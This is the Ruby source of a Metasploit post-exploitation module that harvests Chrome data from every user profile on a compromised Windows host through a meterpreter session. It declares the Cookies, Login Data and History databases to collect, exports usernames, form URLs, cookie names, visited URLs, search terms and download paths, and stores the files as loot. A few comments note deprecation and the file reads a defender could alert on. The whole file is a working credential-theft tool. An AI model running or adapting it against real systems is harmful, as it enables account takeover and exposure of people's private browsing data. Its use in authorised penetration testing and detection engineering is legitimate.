rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/chrome.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
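# Post module that collects Chrome browser artifacts from every user profile
# on a Windows host by handing a declarative artifact table to the Packrat
# mixin. The module is deprecated in favour of post/windows/gather/enum_browsers.
#
# Defender's view of what is touched, as declared in ARTIFACTS below: the
# SQLite files named 'Cookies', 'Login Data' and 'History', looked up via the
# 'LocalAppData' path key and the 'Google' directory for each profile. Reads of
# these files by a process other than the browser are the observable to alert on.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat
  include Msf::Exploit::Deprecated

  # NOTE(review): the first argument is nil, so no removal date appears to be
  # set; only the replacement notice is supplied.
  deprecated nil, 'The post/windows/gather/enum_browsers module now supersedes this module'

  # Artifact table consumed by run_packrat. Each entry names one file to locate
  # and, for SQLite artifacts, the table/column pairs to export from it.
  ARTIFACTS =
    {
      application: 'chrome',
      app_category: 'browsers',
      gatherable_artifacts: [
        {
          filetypes: 'cookies',
          path: 'LocalAppData',
          dir: 'Google',
          artifact_file_name: 'Cookies',
          description: "Chrome's Cookies",
          credential_type: 'sqlite',
          sql_search: [
            {
              sql_description: "Database Commands which exports Chrome's Cookie data",
              sql_table: 'cookies',
              # Only cookie metadata is selected; no value column is listed here.
              sql_column: 'host_key, name, path'
            }
          ]
        },
        {
          filetypes: 'logins',
          path: 'LocalAppData',
          dir: 'Google',
          artifact_file_name: 'Login Data',
          description: "Chrome's saved Username and Passwords",
          credential_type: 'sqlite',
          sql_search: [
            {
              sql_description: "Database Commands which exports Chrome's Login data",
              sql_table: 'logins',
              # The export lists the account name and form URL only. The whole
              # database file is presumably still kept when STORE_LOOT is set --
              # confirm against the Packrat mixin.
              sql_column: 'username_value, action_url'
            }
          ]
        },
        {
          filetypes: 'web_history',
          path: 'LocalAppData',
          dir: 'Google',
          artifact_file_name: 'History',
          description: "Chrome's History",
          credential_type: 'sqlite',
          # These descriptions previously said "Login data" (copy-paste from the
          # logins entry) although every table here belongs to the History file.
          sql_search: [
            {
              sql_description: "Database Commands which exports Chrome's History data",
              sql_table: 'urls',
              sql_column: 'url'
            },
            {
              sql_description: "Database Commands which exports Chrome's History data",
              sql_table: 'keyword_search_terms',
              sql_column: 'lower_term'
            },
            {
              sql_description: "Database Commands which exports Chrome's History data",
              sql_table: 'downloads',
              sql_column: 'current_path, tab_referrer_url'
            },
            {
              sql_description: "Database Commands which exports Chrome's History data",
              sql_table: 'segments',
              sql_column: 'name'
            },
            {
              sql_description: "Database Commands which exports Chrome's History data",
              sql_table: 'downloads_url_chains',
              sql_column: 'url'
            }
          ]
        }
      ]
    }.freeze

  # Registers module metadata and the user-settable options.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chrome Credential Gatherer',
        'Description' => %q{
          This module searches for credentials stored on Chrome on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # The ARTIFACTS option accepts 'All' plus every distinct :filetypes value
    # declared in the ARTIFACTS constant above, so the choices track the table.
    artifact_choices = ARTIFACTS[:gatherable_artifacts].map { |entry| entry[:filetypes] }.uniq.unshift('All')

    register_options(
      [
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', artifact_choices])
      ]
    )
  end

  # Prints the active filter options, then runs the Packrat sweep once per
  # user profile returned by grab_user_profiles.
  def run
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # used to grab files for each user on the remote host
    grab_user_profiles.each do |userprofile|
      run_packrat(userprofile, ARTIFACTS)
    end

    print_status 'PackRat credential sweep completed'
  end
end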